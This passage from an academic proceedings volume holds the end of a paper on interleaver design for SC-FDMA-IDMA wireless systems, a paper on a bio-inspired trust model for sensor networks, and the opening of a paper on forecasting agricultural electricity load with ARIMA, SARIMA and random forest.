(5) The first row of the interleaver for user k is formed by cyclically shifting the initial interleaver by S*k steps, where int(S) = ICN / K is the shifting unit step and int(S) returns the maximum whole number not greater than S. For example, with data information bits m = 8 and spreading factor sl = 3, the chip length is m*sl = N = IR * ICN = 24.
Let IR = 4, ICN = 6, IR * ICN = 24, and K = 3; then
S = 6/3 = 2, and S*k = 0, 2, 4 for k = 0, 1, 2.
Table 1 shows the initialization of the matrix of length N = 24.
The interleaving bit sequence for user 1 is
Π1 = 3,7,16,18,2,11,13,22,0,8,17,9,4,6,14,23,15,19,12,20,5,21,1,10.
First row for the row permutation for user 2 = 4,0,2,5,3,1
First row for the column permutation for user 2 = 0,0,2,1,3,1
Π2 = 22,0,14,11,9,1,6,20,17,15,7,4,2,23,21,13,10,12,5,3,19,16,18,8
First row for the row permutation for user 3 = 2,5,3,1,4,0
First row for the column permutation for user 3 = 2,1,3,1,0,0
Π3 = 20,5,9,7,4,12,11,15,13,10,18,2,21,19,16,0,8,17,1,22,6,14,23,3.
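The cyclic-shifting construction in steps (3)–(5) can be sketched in Python. This is a sketch only: the initial pattern is taken from the paper's worked example rather than recomputed from the quadratic permutation polynomial, and a left cyclic shift is assumed, which reproduces the first rows listed above.

```python
def cyclic_shift(seq, steps):
    """Rotate a sequence left by `steps` positions."""
    steps %= len(seq)
    return seq[steps:] + seq[:steps]

# Worked example from the text: IR = 4, ICN = 6, K = 3 users.
initial = [3, 1, 4, 0, 2, 5]   # initial interleaver pattern from Eq. (2)
I_R, I_CN, K = 4, 6, 3
S = I_CN // K                  # shifting unit step: int(S) = ICN / K = 2

for k in range(K):
    # First row for user k: cyclic shift of the initial pattern by S*k steps.
    row_first = cyclic_shift(initial, S * k)
    # Column-permutation first row: remainder of each element divided by IR.
    col_first = [x % I_R for x in row_first]
    # Remaining rows: one-step cyclic shifts of the previous row.
    rows = [row_first]
    for _ in range(I_R - 1):
        rows.append(cyclic_shift(rows[-1], 1))
    print("user", k + 1, row_first, col_first)
```

For user 2 (k = 1) this reproduces the first rows 4,0,2,5,3,1 and 0,0,2,1,3,1 quoted above.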
In the next step, these ratios are continuously updated through the feedback path during the iteration process, and an estimate of the correctly received bits is obtained.
Fig. 1 Transmitter and receiver structure of the SC-FDMA-IDMA scheme in Agarwal and Shukla [15]
4 Simulation Results

Fig. 2 Bit error rate performance with numerous interleavers of the SC-FDMA-IDMA scheme (n = 16, block = 50, iterations = 5)
[Fig. 3 BER curves of the SC-FDMA-IDMA (lfdma) scheme with q = 2, it = 5, block = 50, for n = 4, 8, and 16 users]
Fig. 4 Comparison of the SC-FDMA-IDMA BER performance with the OFDM-IDMA system under the same simulation parameters
5.8 dB for the SC-FDMA-IDMA scheme, whereas OFDM-IDMA requires 11 dB for the same bit error rate. From Fig. 4, we can say that the SC-FDMA-IDMA scheme with the proposed interleaver requires lower bit energies for transmission than the OFDM-IDMA scheme. All the simulations assume data bits = 512, sl = 16, chip length = 8192, and n (users) = 16, with ICN = 512 so IR = 16. With a random interleaver (14*8196*5 = total bits required), a huge memory is required at the base station; in a tree-based interleaver, 2 orthogonal interleavers are required to generate the other interleavers; but the proposed efficient interleaver requires only (10 + 16*5 = total bits): we have to send only the values of r and n, and from these values all other interleavers are generated.
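The memory comparison above amounts to the following back-of-the-envelope arithmetic, reproducing the paper's own factors (the meaning of each factor is as quoted in the text, not independently derived here):

```python
# Memory needed at the base station for storing interleaver patterns,
# using the totals quoted in the text.
random_interleaver_bits = 14 * 8196 * 5    # random interleavers
proposed_interleaver_bits = 10 + 16 * 5    # proposed scheme: send only r and n

print(random_interleaver_bits)     # total bits for the random interleaver
print(proposed_interleaver_bits)   # total bits for the proposed interleaver
print(random_interleaver_bits // proposed_interleaver_bits)  # reduction factor
```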
5 Conclusions
A novel method is suggested in this paper to generate an efficient interleaver that has a lower memory storage requirement and less complexity. Simulation results show that the proposed interleaver, integrated with the SC-FDMA-IDMA scheme, makes this scheme highly recommended for uplink communication, particularly for 5G non-orthogonal multiple access.
References
1. Ping, L., Liu, L., Wu, K., & Leung, W. K. (2006). Interleave-division Multiple-access. IEEE
Transactions on Wireless Communication, 5(4), 938–947.
2. Kusume, K., & Bauch, G. (2008). Simple construction of multiple interleavers: Cyclically shifting a single interleaver. IEEE Transactions on Communications, 56(9), 1394–1397.
3. Ping, L., Liu, L., Wu, K., & Leung, W. K. (2003). A simple approach to near-optimal
multiuser detection: interleave-division multiple-access. In IEEE Wireless Communications
and Networking Conference, WCNC 2003 (vol. 4, no. 1, pp. 391–396).
4. Wu, S., Chen, X., & Zhou, S. (2009). A parallel interleaver design for IDMA systems. In 2009 International Conference on Wireless Communications & Signal Processing, Nanjing (pp. 1–5).
5. Pupeza, I., Kavcic, A., & Ping, L. (2006). Efficient generation of interleavers for IDMA. In IEEE International Conference on Communications, ICC 2006 (vol. 4, pp. 1508–1513).
6. Yadav, M., Gautam, P. R., Shokeen, V., et al. (2017). Modern Fisher-Yates shuffling based
random interleaver design for SCFDMA-IDMA systems. Wireless Personal Communications,
97, 63–73.
7. Lai, K., Wen, L., Lei, J., et al. (2019). Secure transmission with interleaver for uplink sparse code multiple access system. IEEE Wireless Communications Letters, 8(2), 336–339.
8. Haghighat, A., Nazar, S. N., Herath, S., & Olesen, R. (2017). On the performance of IDMA-based non-orthogonal multiple access schemes. In IEEE 86th Vehicular Technology Conference (VTC-Fall) (pp. 1–5), Toronto.
9. Hamdoun, H., Nazir, S., Alzubi, & Laskot, P. (2020). Performance benefits of network coding for HEVC video communications in satellite networks. Iranian Journal of Electrical and Electronic Engineering, 17(3), 1–11.
10. Xiong, X., & Luo, Z. SC-FDMA-IDMA: A hybrid multiple access scheme for LTE uplink. In 7th International Conference on Wireless Communications, Networking and Mobile Computing (pp. 1–5), Wuhan.
11. Hao, D., & Hoeher, P. A. (2008). Helical interleaver set design for interleave-division
multiplexing and related techniques. IEEE Communications Letters, 12(11), 843–845.
12. Takeshita, O. Y. (2007). Permutation polynomial interleavers: an algebraic-geometric perspec-
tive. IEEE Transactions on Information Theory, 53(6), 2116–2132.
13. Yadav, M., Shokeen, V., & Singhal, P. K. (2019). Flip Left-to-Right approach based inverse
tree interleavers for unconventional integrated OFDM-IDMA and SCFDMA-IDMA systems.
Wireless Personal Communications, 105, 1009–1026.
14. Hao, W., Ping, L., & Perotti, A. (2006). User-specific chip-level interleaver design for IDMA
systems. IEEE Electronic Letters, 42(4), 233–234.
15. Agarwal, R., & Shukla, M. (2017). SC-FDM-IDMA scheme employing BCH Coding.
International Journal of Electrical and Computer Engineering (IJECE), 7(2), 992–998.
16. Shukla, M., Srivastava, V., & Tiwari, S. (2008). Analysis and design of Tree Based Interleaver
for multiuser receivers in IDMA scheme. In 16th IEEE International Conference on Networks,
pp. 1–4, New Delhi.
Enhanced Bio-inspired Trust
and Reputation Model for Wireless
Sensor Networks
Abstract Today, WSNs are widespread in both industry and academia, which are focusing their research efforts on enhancing their applications. One of the first concerns to address in order to achieve that expected enrichment is to ensure a minimum level of security in such a restrictive environment. This study concentrates on trust and reputation system management. The proposed approach, titled enhanced bio-inspired trust and reputation model (EBTRM), extends the bio-inspired trust and reputation model (BTRM). The aim of the proposed algorithm is to provide an adequate security solution to the collusion network problem of BTRM, offering a high level of security and energy-preserving ability.
1 Introduction
In the last few years, researchers and scientists have paid more attention to the area of WSNs [1]. WSNs are composed of a large number of sensor nodes. These sensor nodes are small in size and battery powered [2, 3]. In WSNs, a sensor node senses, collects, processes, and transmits data to other nodes to complete a task in a distributed manner. In WSNs [4, 5], the result is based on sensor node cooperation. WSNs serve a wide variety of applications, for example, industrial process control, ecological and habitat monitoring, home automation, health care systems, weather forecasting, traffic control, etc. Generally, WSNs are deployed in an outdoor environment, where the
V. Arya (B)
Department of ECE (FET), Gurukula Kangri (Deemed To Be University), Haridwar 249404, India
S. Rani
Department of Computer Science and Engineering, Gulzar Group of Institutes, Khanna, Punjab
141401, India
N. Choudhary
Department of CSE, JECRC, Jaipur, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 569
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_46
570 V. Arya et al.
Trust and reputation system (TRS) management is a creative solution for sustaining a minimum security level between two objects having transactions or interactions within a distributed system. Trust is a particular level of the subjective probability with which an agent will perform a particular action, while reputation is an expectation about the behavior of an agent based on information about, or observations of, its prior behavior. In many cases, these two terms are not distinguished definitely and may be used interchangeably. In WSN transactions, if we define the sensors asking for services as client sensors and the sensors providing services as server sensors, then the client sensors will decide whether to have transactions with a server sensor based on its trustworthiness or reputation. A trust and reputation model is usually composed of five components: gathering information, scoring and ranking, selecting objects, having the transaction, and reward or punishment. Gathering information, the first element of a trust and reputation system, is responsible for collecting behavioral information about other objects, for example, peers, agents, or paths. The information collected might come from different objects: it could be direct observation, own experience, or information provided by other nodes. Once information about an object has been properly assembled and weighed, a reputation score is estimated and assigned based on a certain algorithm. The main aim of this process is to provide the clients a determinable approach to decide which server node is most trustworthy. The next step is that a client selects the most trustworthy or reputable server object in the society providing a certain service, and then adequately communicates with it. After receiving the service provided, the client will assess the result and give a score of
Enhanced Bio-inspired Trust and Reputation Model … 571
satisfaction. Based on the satisfaction obtained, the final step, punishing or rewarding, is carried out. If a server node is unsuccessful in making the client satisfied with the service provided, its reputation score will be affected, and the client is less likely to have transactions with it again.
BTRM-WSN [18] carries out the selection of the most trustworthy node through the most reputable path offering a certain service. It is based on a bio-inspired algorithm called the ant colony system (ACS), where ants form paths in order to fulfill some conditions, leaving pheromone traces that help subsequent ants discover and follow those paths. These pheromone values help ants discover the optimal path, since the optimal path will have the maximum amount of pheromone. When we apply this ACS algorithm to a trust and reputation system, the trustworthiness of sensors is represented by the pheromone value. In BTRM-WSN, each sensor node holds pheromone traces for its neighbors (τ ∈ [0, 1]), which determine the probability for an ant to select a path, as well as the sensor the path leads to, as a solution. In other words, τ can be considered as the trust that one sensor gives another. The steps of the BTRM algorithm are as follows:
A set of artificial ants is created, and they leave the client sensor. When an ant proceeds from a node i to a node j, it instructs these two sensor nodes to update the pheromone value of the path between them through Eqs. (1) and (2),
τij = (1 − ϕ)·τij + ϕ·Ωij (1)

Ωij = 1 + (1 − ϕ)·(1 − τij)·ηij (2)

where τij is the pheromone value of the path between sensor i and sensor j, Ωij is the convergence value of τij, and ϕ is a parameter controlling the amount of pheromone left by the ants.
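A sketch of the pheromone update under one reading of Eqs. (1) and (2), writing omega for the convergence value of τij (this interpretation of the update is an assumption, not taken verbatim from BTRM-WSN):

```python
def update_pheromone(tau, eta, phi):
    """Update the pheromone (trust) of the link i -> j crossed by an ant.

    tau: current pheromone value of the link, tau in [0, 1]
    eta: heuristic value eta_ij of the link
    phi: parameter controlling the pheromone left by the ants
    """
    omega = 1 + (1 - phi) * (1 - tau) * eta   # convergence value, Eq. (2)
    return (1 - phi) * tau + phi * omega      # Eq. (1)
```

For example, with tau = 0.5, eta = 0.1, and phi = 0.5, the crossed link's pheromone rises from 0.5 to 0.7625, reinforcing the path for later ants.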
As an ant moves through the network searching for the most trustworthy path to a server providing a good service, it must decide whether to stop and return the solution to the client or continue to discover another one, based on the reputability of the server discovered so far. When ant k reaches a sensor s, several situations may occur. The first is that sensor s has more neighbors not visited by ant k; then, k estimates the average pheromone value (τk) of the path followed by ant k from the client to the sensor s. If τk is greater than a prescribed transition threshold TraTh, then ant k stops and returns the solution; otherwise it continues. Another situation is that s does not provide any service. If sensor s has more neighbors not visited by ant k, then k decides the next node to move to. If all of sensor s's neighbors have been visited, then ant k reaches a dead end. It has to go back along the route that it has formed until it reaches either a sensor offering the requested service or a sensor not offering the requested service but having more neighbors not yet visited [19].
The client will test and determine the quality of the solution brought back by each launched ant. The quality of a path can be computed by Eq. (3),

Q(Sk) = (τk / Length(Sk)^PLF) · %Ak (3)
Here, Sk designates the solution brought back by ant k; Q(Sk) defines the quality of path Sk; τk designates the average pheromone of path Sk found by ant k; PLF ∈ [0, 1] defines a path length factor; and %Ak denotes the percentage of ants that have selected the same solution as ant k. After estimating the path quality of all solutions brought back by the ants, the client selects the path with the maximum score and records it as the Current_Best solution. Then, the client compares its quality with that of the best solution (Global_Best) found in earlier transactions. If the Current_Best solution is better, the client replaces the previous Global_Best with the Current_Best solution. Then, an extra ant is sent to reinforce the pheromone value of the current Global_Best.
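Equation (3) and the client-side selection of the best solution can be sketched as follows (names are illustrative; Length(Sk) is taken here as the hop count of the path):

```python
def path_quality(avg_pheromone, length, pct_same_ants, plf):
    """Q(S_k) = tau_k / Length(S_k)**PLF * %A_k  (Eq. 3)."""
    return avg_pheromone / (length ** plf) * pct_same_ants

# Client-side selection among the solutions brought back by the ants.
# Each solution: (average pheromone, path length, fraction of ants agreeing).
solutions = [(0.9, 4, 0.5), (0.7, 2, 0.8)]
current_best = max(path_quality(t, l, a, plf=1.0) for t, l, a in solutions)
```

Note that with PLF = 0 the path length is ignored, while PLF = 1 penalizes longer paths in full, which is the setting EBTRM adopts later in this paper.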
After the client selects the Global_Best solution, it carries out a transaction with the
selected sensor and receives the service it expects to obtain. Two conditions may arise:
the selected server sensor may be completely trustworthy and provide the accurate service
as it is assumed to, or it may be totally malicious and provide a highly different service.
In the former condition, the client is satisfied, and the satisfaction value (Sat) is drawn
as a random number between PunTh and 1; in the latter condition, Sat is drawn as a random
number between 0 and PunTh, as the client is considered unsatisfied. PunTh is a predefined
punishment threshold value.
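A minimal sketch of how the satisfaction value Sat might be drawn, assuming the PunTh value listed later in Table 1 (names are illustrative):

```python
import random

PUN_TH = 0.48  # predefined punishment threshold (BTRM value from Table 1)

def satisfaction(service_was_accurate: bool) -> float:
    """Sat in (PunTh, 1) for a satisfying service, (0, PunTh) otherwise."""
    if service_was_accurate:
        return random.uniform(PUN_TH, 1.0)
    return random.uniform(0.0, PUN_TH)
```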
Enhanced Bio-inspired Trust and Reputation Model … 573
A client requests the desired service from what it judges to be the most reputable
server through the most trustworthy path. A punishment or reward is then applied to
every link in this path, depending on whether the client is satisfied with the service
provided by the server. This is done by increasing or decreasing the pheromone value
of the path [20–23].
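The punish/reward step can be sketched as a pheromone update over every link of the used path; the multiplicative rule below is an illustrative assumption, not BTRM's exact formula:

```python
def update_path_pheromone(pheromone, path, sat, pun_th=0.48, rate=0.1):
    """Reward (sat > pun_th) or punish every link (i, j) on the path."""
    for link in zip(path, path[1:]):
        if sat > pun_th:
            pheromone[link] = min(1.0, pheromone[link] * (1 + rate))
        else:
            pheromone[link] = max(0.0, pheromone[link] * (1 - rate))

pheromone = {("s1", "s2"): 0.5, ("s2", "s3"): 0.5}
update_path_pheromone(pheromone, ["s1", "s2", "s3"], sat=0.9)  # reward case
```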
This section introduces an enhanced bio-inspired trust and reputation system (EBTRM)
based on the BTRM model examined in the previous section. In the EBTRM algorithm, we
modify the parameter values of the bio-inspired algorithm. The flow chart and the
improvements to the BTRM algorithm (EBTRM) are shown in Fig. 1.
Q(S_k) = (τ_k / Length(S_k)) · %A_k

In the first modification, PLF is set to 1, which favours the selection of paths that are
as short as possible. In the second modification, we enhance the radio range and take the
maximum radio range, because a maximum radio range provides security: two nodes within
maximum radio range can communicate directly, whereas with a minimum range they cannot
communicate directly and the possibility of interference by a malicious node increases.
The last modification is in the value of q0 (= 0.6335): the probability of deterministically
choosing the most trustworthy next node is increased, which increases the accuracy of
the system.
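The parameter q0 plays the role it has in Ant Colony System's pseudo-random proportional rule [22]: with probability q0 the ant deterministically picks the best-rated next node, otherwise it samples proportionally. A sketch, with illustrative desirability weights:

```python
import random

Q0 = 0.6335  # EBTRM value (0.45 in BTRM)

def choose_next(neighbors: dict) -> str:
    """neighbors maps node id -> desirability (e.g. pheromone * heuristic)."""
    if random.random() <= Q0:
        # Exploit: deterministically pick the most trustworthy next node.
        return max(neighbors, key=neighbors.get)
    # Explore: sample a node proportionally to its desirability.
    total = sum(neighbors.values())
    r, acc = random.uniform(0, total), 0.0
    for node, weight in neighbors.items():
        acc += weight
        if r <= acc:
            return node
    return node  # fallback for floating-point edge cases
```

Raising q0 from 0.45 to 0.6335 shifts the balance toward exploitation of the best-known next hop.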
574 V. Arya et al.
Fig. 1 Flow chart of the EBTRM algorithm: each returned solution quality Q(Sk) is compared with Q(Current_Best) until the timeout expires, after which global pheromone updating is performed
5 Simulation Results
In our proposed work, we consider ten networks composed of 10–100 sensor nodes,
each run for 10 executions in a two-dimensional area. Sensor nodes in a cluster with a
particular radio range transmit the data to the cluster head and then to the base
station of the network. In a collusion network, every malicious node gives
the maximum rating to every other malicious node and the minimum rating to every
benevolent one. We used the Java-based, event-driven TRMSim-WSN simulator [24],
version 0.5, for WSNs, which allows researchers to simulate random
network distributions, provides statistics on different data dissemination policies,
and supports testing different strategies of trust and reputation models.
Many network types, such as collusion, oscillating and dynamic networks, with varying
percentages of malicious nodes, can be implemented and tested with it. In
our experiment, we concentrated on the collusion network and on enhancing the accuracy of
the system.
Table 1 Parameters of BTRM and EBTRM

Parameters            | BTRM values | EBTRM values
Phi                   | 0.01        | 0.01
Rho                   | 0.87        | 0.87
q0                    | 0.45        | 0.6335
Num ants              | 0.35        | 0.35
Num iterations        | 0.59        | 0.59
Alpha                 | 1.0         | 1.0
Beta                  | 1.0         | 1.0
Initial pheromone     | 0.85        | 0.85
Punishment threshold  | 0.48        | 0.48
Path length factor    | 0.71        | 1
Transition threshold  | 0.66        | 0.66
Radio range           | 12 m        | 50 m
In our work, we use accuracy to evaluate the reliability and level of security
provided by the trust and reputation system: it is the percentage of transactions in
which the system successfully selects trustworthy sensors. A good trust and reputation
system should limit the negative influence that malicious nodes have on the WSN.
Figure 2 compares the accuracy of the BTRM and EBTRM algorithms for a varying number
of malicious nodes.
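As a formula, the accuracy metric used here is simply:

```python
def accuracy(trustworthy_selections: int, total_transactions: int) -> float:
    """Percentage of transactions in which a trustworthy sensor was selected."""
    return 100.0 * trustworthy_selections / total_transactions

print(accuracy(93, 100))  # 93.0
```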
Path length is the average number of hops leading to the most trustworthy sensors
selected by the client in a WSN applying a certain trust and reputation system.
A smaller average path length indicates better efficiency and greater ease in searching
for trustworthy sensors. Figure 3 shows the path length of the BTRM and EBTRM
algorithms graphically.
Energy consumption of the network is the overall energy consumed by: client nodes
sending request messages, server nodes sending response services, malicious nodes
providing bad services, relay nodes that do not provide services, and the execution of
the trustworthy-sensor search process of the trust and reputation system. Effectively
reducing energy consumption is a major research problem in WSNs. Figure 4 shows that
EBTRM has the lowest energy consumption.
6 Conclusions
Our proposed EBTRM system successfully increases the accuracy, and therefore the level
of security, of the original BTRM-WSN without sacrificing its advantages in finding
trustworthy sensors efficiently, and the extra amount of energy for these add-ons is
acceptable. EBTRM is proven able to accurately distinguish benevolent sensors from
malicious sensors and thus protect WSNs from attackers. Most importantly, the level of
security it provides is not influenced by the number of attackers as much as its two
competitors are. When the network is in a relatively secure state, searching for
trustworthy sensors becomes more complicated and less energy efficient because of the
extra conditioning and computation; overall, however, the modifications to BTRM are
successful. Our proposed EBTRM provides a better solution for WSNs where a high level
of security is required. Future work will continue developing the trustworthy-sensor
search algorithms to improve both the ease of finding trustworthy sensors and energy
efficiency. EBTRM provides a higher level of security for WSNs without sacrificing the
efficiency of the original approach and does not require a huge amount of extra energy.
References
21. Karthik, S., Vanitha, K., & Radhamani, G. (2011). Trust management techniques in wireless
sensor networks: An evaluation. IEEE.
22. Dorigo, M., & Stützle, T. (2004). Ant colony optimization. Bradford Book.
23. Ukil, A. Trust and reputation based collaborating computing in wireless sensor networks.
In Second International Conference on Computational Intelligence, Modelling and Simulation.
24. Mármol, F., et al. (2009). TRMSim-WSN, trust and reputation models simulator for WSNs. In
IEEE Communication Society.
Analytical Machine Learning
for Medium-Term Load Forecasting
Towards Agricultural Sector
Abstract The economic growth of any country depends upon available resources
and their proper management. All the sectors, residential, industrial, commercial or
agricultural require sufficient and reliable energy services. Electricity is one of the
most important forms of energy that cannot be replaced by any other energy input. The
agriculture sector has an important role in the process of foodstuff production.
Non-food products such as tobacco and jute also contribute to the economy. Electricity
plays an important role in irrigation in the agricultural sector. Proper management of
the energy consumption for irrigation is required for the utilization of the existing
resources. So, there is a need for predicting the future consumption of electricity in
the agricultural sector. Medium term load forecasting is used for predicting weeks to
years ahead electricity consumption. In the proposed work, statistical and machine
learning based algorithms are used to predict one year ahead electricity consumption
in the agricultural sector. Time series based statistical techniques such as auto-
regressive integrated moving average (ARIMA), seasonal ARIMA (SARIMA) and exponential
smoothing (ES), and a machine learning based approach, random forest (RF),
are used to forecast medium term load consumption in the agricultural field. The
SARIMA model shows the minimum root mean square percentage error (RMSPE).
The results show that statistical approaches such as SARIMA and ES outperform
random forest.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 581
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_47
582 M. Sharma et al.
1 Introduction
Electricity load forecasting is required at every level, for consumers, utilities,
distributors and generators, since accurate prediction plays an imperative role in
planning. In the current scenario, with a pandemic and lockdown all over
India, many consumers faced the issue of inflated bills. The reason
is that utilities estimated bills from the consumption pattern of the consumer
over the last four months, then averaged it. To resolve such
issues, a proper forecasting technique with high accuracy is required. Energy
demand forecasting is important, but it is a difficult task in the agricultural field
because of the multiple factors on which it depends and their varying nature. In the
agriculture sector, existing work on forecasting energy demand relies on trends and
factors relevant to national averages, although energy demand varies with
weather, crops, area, farm machinery and technologies, pump sets and groundwater.
Proper management of irrigation is required to enhance the yield.
As pumped irrigation depends on electricity, there is a need to forecast electricity
consumption in the agricultural sector [1].
There has been rapid growth in electricity consumption in every sector, and the
agriculture sector shows sharp growth as well: it accounted for 17.49% of the
total electricity consumption in the year 2018–19 [2]. Electricity consumption in
the agriculture sector increases annually and changes with the crop seasons.
The supplied electricity is subsidized, or in places free, and
most areas are unmetered. Farmers need incentives for growing appropriate
crops, but because the supply is unmetered they are wrongly blamed for high power
consumption, and they face the problem of poor-quality electricity. Most of the
electricity provided to the agriculture sector is subsidized. If proper forecasting is
done in the agriculture sector, it benefits farmers, utilities and the government.
To truly estimate electricity consumption, meters need to be deployed in the field.
In this paper, both flat-rate and metered electricity consumption are considered to
estimate future consumption.
The sector-wise energy consumption in India is shown in Fig. 1. As per the 2011
census, 61.5% of India's population is rural and dependent on agriculture, and this
sector contributes 14.4% of Indian GDP (as per the 2018–19 economic survey) [3].
If electricity consumption is forecast properly according to the season, it benefits
the farmer and helps utilize the resources available in that season.
Four types of load forecasting exist on the basis of time horizon: very
short term load forecasting (VSTLF) for predicting minutes to an hour ahead,
short term load forecasting (STLF) for predicting a day to a week ahead,
medium term load forecasting (MTLF) for predicting
the load two weeks to three years ahead, and long-term load forecasting (LTLF)
Analytical Machine Learning for Medium-Term Load Forecasting … 583
to predict the load more than three years ahead [4]. In this paper, we predict
one year ahead electricity consumption in the agricultural sector using different
types of forecasting techniques.
Many forecasting techniques exist; they are classified into two categories
[4, 5]:
(a) Statistical approach: further classified into time series analysis and
regression techniques [6].
(b) Intelligent approach: fuzzy logic, machine learning and deep learning
techniques.
In this paper, we focus on time series analysis, in which the projected consumption
depends on its previous historical consumption. Four techniques are applied
to the dataset: auto-regressive integrated moving average (ARIMA), seasonal ARIMA
(SARIMA), exponential smoothing (ES) and random forest (RF); among these,
SARIMA shows the best results.
This paper is organized as follows. Section 2 reviews the work done to forecast
electricity consumption based on different indicators. Section 3 provides
details of the proposed methodology used for forecasting the consumption pattern.
Section 4 presents the results achieved by the different forecasting
techniques. Section 5 provides the conclusion and future work.
2 Literature Review
In this section, a detailed view of the work done on energy consumption forecasting is
given. Energy indicators are used to identify the trends and key drivers needed to
optimize energy consumption. Energy indicators are selected by correlation coefficient
analysis with the target output, and their accuracy depends on the performance.
Three types of energy indicators are defined, social, economic and environmental,
according to "Energy Indicators for Sustainable Development: Guidelines and
Methodology" [7].
In [8], economic indicators are used to forecast electricity consumption in the
agricultural sector. The electricity prediction depends on population, per capita GDP,
and farming land. An artificial neural network is applied to forecast electricity, where
the input neurons are the economic indicators and the output variable is the AS-EC
(agriculture sector electricity consumption).
In [9], an IoT-based approach is proposed to diagnose, monitor and control the
factors that affect crop yield and to optimize the irrigation requirement. The authors
considered temperature, humidity and soil moisture as parameters that need
analysis for optimal watering. Sensors are deployed in the field to measure the
soil moisture, and accordingly the future water need of the crop is analysed.
In [10], an ARIMA model is used to forecast electricity consumption in an insti-
tution, and it is shown that a monthly time series gives better results than bi-monthly
and quarterly time series. The dataset is from a health care institute. Finally,
an equation is given based on the selected model: the model with minimum
SSE and MPE error is selected to forecast electricity consumption.
A season-based model is given in [11], in which short-term load forecasting is
performed using ARIMA, SARIMA, a neural network, an RNN, and an RNN with
average true range (ATR). Model performance is compared and the best
model, giving the least error for the energy management system, is selected.
Forecasts are made for three seasons, May–June, July–September, October–December;
among the five models, the RNN with ATR gives better results for the different
seasons, but every season needs a different model to forecast future values.
An ARIMA model is used to forecast seven-year electricity consumption in
different sectors. Each sector has a different ARIMA (p,d,q) model of auto-regression,
differencing, and moving average. That paper considers the domestic, commercial,
and industrial sectors, while the agricultural sector is untouched [12].
In [13], a model is proposed for short term load forecasting using random forest and
multi-layer perceptron to predict one week ahead electrical load data.
3.1 Dataset
The monthly electricity consumption data is collected from Jaipur Vidyut Vitran
Nigam Limited (JVVNL). In data pre-processing, we select only agricultural flat-rate
and metered energy consumption data. The data are collected monthly from January 2015
to April 2020. We train the model on January 2015–December 2019 data, test it on
January 2020–April 2020, and forecast the electricity consumption pattern for the
next year.

Fig. 2 Auto ARIMA model for forecasting electricity consumption, where the x-axis shows the
year and the y-axis represents electricity consumption in Lakh Units
3.2 Methodology
The ARIMA model is the combination of a moving average and an auto-regressive process
with integrated differencing. Accurate load forecasts one or multiple time lags into
the future can be produced from historical consumption data. First, the input
data is transformed into a stationary time series; then the autocorrelation function
(ACF) and partial ACF (PACF) are used to obtain the orders of the auto-regressive (AR),
moving average (MA), seasonal AR (SAR), and seasonal MA (SMA) components. A moving
average process of order q, MA(q), has an ACF that cuts off after q lags; the PACF
helps to obtain the order of an AR(p) process, an auto-regressive process of order p,
which has a PACF that cuts off after p lags. The series is transformed to stationarity
so that one part of the time series behaves statistically like any other part [10].
The one year ahead forecasted pattern of electricity consumption is shown in Fig. 2.
Fig. 3 a Monthly electricity consumption, b log transformation of time series data, c difference of
the log transformation to remove trend, d stationary form of data
Step-1: Transform the time series into a stationary series using log transformation
and differencing, removing trend and seasonality. The transformation of the monthly
electricity consumption data into stationary data is given in Fig. 3, where the x-axis
shows time and the y-axis shows electricity consumption (EC) in the agricultural
sector.
Step-2: The ACF and PACF at different time lags decide the orders of the moving
average and auto-regressive terms. The degree of MA, determined using the ACF, is
1; there is a seasonal component after lag 12, so the degree of Q is searched up to 5.
The degree of p is 0 or 1, and the degree of P is 1, as decided by the PACF.
Step-3: Model selection: the best model among (0,0,0,0,0,0) to (1,1,1,1,1,5) is chosen
on the basis of the AIC and SSE values. The model SARIMA (1,1,1)(0,1,2) gives the
minimum AIC value and a low SSE. The model is then fitted to forecast future values.
Step-4: The Ljung-Box test on the residuals shows that there is no correlation among
them.
Step-5: Fit the model to the time series: the model with the lowest AIC
and SSE values is selected for forecasting the electricity consumption. The pattern
of the electricity consumption forecast by the SARIMA model is shown in Fig. 4.
Fig. 5 Actual vs. forecasted electricity consumption, where the black line represents the
actual value and the red line shows the predicted value
One of the most important uses of machine learning [15] is that algorithms such as
random forest (RF) can identify important features; in time series data, the important
features are the time lags. RF creates a new dataset with 12 months of lag values to
predict the current observation and is used to identify which of these lag values are
most important for predicting the current value.
The value from two time periods ago, t-2, is the most important, followed by the value
at the present time t, as shown in Fig. 6. The most important time lag observations for
predicting the current value of the response variable are t, t-10, t-9 and t-2.
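The lag-importance analysis can be sketched as follows (synthetic series in place of the JVVNL data; lag names such as `t-1` are illustrative):

```python
# Build 12 lagged features and rank them by RF feature importance.
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestRegressor

rng = np.random.default_rng(2)
t = np.arange(120)
y = pd.Series(30000 + 8000 * np.sin(2 * np.pi * t / 12)
              + rng.normal(0, 300, 120))

lagged = pd.concat({f"t-{k}": y.shift(k) for k in range(1, 13)}, axis=1).dropna()
X, target = lagged, y.loc[lagged.index]

rf = RandomForestRegressor(n_estimators=200, random_state=0).fit(X, target)
ranking = sorted(zip(X.columns, rf.feature_importances_),
                 key=lambda p: p[1], reverse=True)
```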
The forecasted electricity consumption using the ARIMA (0,1,9) model is represented
in Fig. 7. The moving average parameters of the ARIMA model are given
in Table 1.
Fig. 7 Actual and forecasted electricity consumption using auto ARIMA model
Table 1 Parameter estimation using ARIMA(0,1,9) model

Coefficient | Value   | Standard error
ma1         | -0.5485 | 0.1359
ma2         | -0.2382 | 0.1391
ma3         | -0.5343 | 0.1510
ma4         | 0.5229  | 0.1515
ma5         | 0.0366  | 0.1489
Electricity consumption is affected by the months/seasons. The coefficients and
standard errors of the SARIMA (1,1,1)(0,1,2) model are shown in Table 2. The two year
ahead forecasted electricity consumption pattern is given in Fig. 8, where the blue line
represents the forecasted consumption and the black line represents the actual
electricity consumption.
The two year ahead electricity consumption pattern is represented in Fig. 9, where the
blue line denotes the forecasted consumption and the black line represents the actual
consumption. The smoothing parameters show that there is no effect of trend but a
strong effect of seasonality. The coefficients of the 12 months are shown in Table 3.
In the random forest, the most important time lag observations for predicting the
current value of the response variable are t, t-10, t-9 and t-2. The electricity
consumption pattern obtained using random forest is shown in Fig. 10, where the red line
denotes the predicted and the blue line the actual electricity consumption.
Table 4 Forecasted electricity consumption from Jan-20 to April-20 using different models

